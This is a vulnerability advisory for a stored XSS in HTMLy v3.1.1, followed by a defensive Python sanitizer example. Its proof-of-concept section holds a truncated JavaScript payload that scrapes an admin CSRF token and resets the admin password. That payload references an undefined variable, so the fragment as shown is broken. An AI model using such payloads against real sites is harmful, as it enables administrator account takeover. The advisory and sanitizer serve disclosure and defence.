# CVE-2026-38949 Summary

## Vulnerability Overview

- **Vulnerability Name**: Stored Cross-Site Scripting (Stored XSS) vulnerability in HTMLy v3.1.1 leading to administrator account takeover.
- **Vulnerability Type**: Stored Cross-Site Scripting (Stored XSS)
- **Vulnerability Description**: In HTMLy v3.1.1, malicious JavaScript code is injected via the content field of the image publishing feature. Due to inadequate input validation, the malicious code is stored and executed when an administrator views the malicious post. The attacker can obtain the CSRF token from the administrator password change page and execute authenticated requests to modify administrator credentials (e.g., password).
- **Severity**: 8.9 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L)
- **CVE ID**: CVE-2026-38949
- **Affected Versions**: HTMLy v3.1.1
- **CWE ID**: CWE-79, CWE-352

## Impact Scope

- **Affected Product**: HTMLy v3.1.1
- **Impact Description**: An attacker can execute JavaScript code within the administrator's authenticated browser session, bypassing CSRF protection by dynamically retrieving valid tokens. This leads to administrator password modification, complete administrator account takeover, persistent unauthorized access, and full control over the application.

## Remediation

- **Remediation Recommendations**:
  - Perform strict validation and filtering of input to prevent malicious code injection.
  - Implement effective CSRF protection mechanisms to ensure the legitimacy of requests.
  - Regularly update software versions to patch known vulnerabilities.

## POC Code

The published proof of concept is truncated at the beginning; the surviving fragment is reproduced as-is:

```html
r.text())
.then(h=>{
  let t=m.match(/name=\"csrf_token\" value=\"([^\"]+)\"/);
  fetch('/htmly/edit/password',{
    method:'POST',
    credentials:'include',
    headers:{'Content-Type':'application/x-www-form-urlencoded'},
    body:'csrf_token='+t[1]+'&username=admin&password=attacker'
  });
});
">
```

## References

- [GitHub Repository](https://github.com/danpros/htmly/)
- [HTMLy Official Website](https://www.htmly.com/)
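The first remediation point above (strict validation and filtering of the content field) is illustrated by the following added example; it is not HTMLy's own code. It is an allowlist sanitizer for an image-post content field that drops every tag and attribute not explicitly permitted, so an injected event handler, `<script>` element or `javascript:` URL is removed before the post is stored, and it reports what it dropped so the event can be logged. Tag names, attribute allowlist and the sample input are constructed assumptions.

```python
from html.parser import HTMLParser
from html import escape

# Allowlist for the image-post content field (assumed policy, not HTMLy's):
# only these tags and, per tag, only these attributes survive.
ALLOWED = {
    "img": {"src", "alt", "title", "width", "height"},
    "a": {"href", "title"},
    "p": set(), "br": set(), "strong": set(), "em": set(),
}
# URL-bearing attributes must start with one of these; this rejects
# javascript:, data: and similar schemes without needing a denylist.
SAFE_SCHEMES = ("http://", "https://", "/")


class ContentSanitizer(HTMLParser):
    """Rebuilds the markup from scratch: text is re-escaped on output and
    anything outside the allowlist is discarded and recorded in `dropped`."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []  # e.g. "script", "img@onerror"; useful for detection logs

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            unsafe_url = name in ("src", "href") and not value.strip().lower().startswith(SAFE_SCHEMES)
            if name not in ALLOWED[tag] or unsafe_url:
                self.dropped.append(f"{tag}@{name}")  # on* handlers land here
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> and <img/> forms

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in ("img", "br"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=True))  # text is never emitted raw


def sanitize(content):
    """Return (clean_html, dropped_items) for a submitted content field."""
    p = ContentSanitizer()
    p.feed(content)
    p.close()
    return "".join(p.out), p.dropped


# Constructed sample in the shape the advisory describes: an image tag carrying
# an injected event handler, followed by a script element.
SAMPLE = '<p>Hi</p><img src="/x.png" onerror="fetch(\'/htmly/edit/password\')"><script>1</script>'
```

Running `sanitize(SAMPLE)` keeps the paragraph and the image's `src` but strips `onerror` and the `<script>` element, and the returned `dropped` list is what a reviewer would want written to the application log when a submission is rejected or altered.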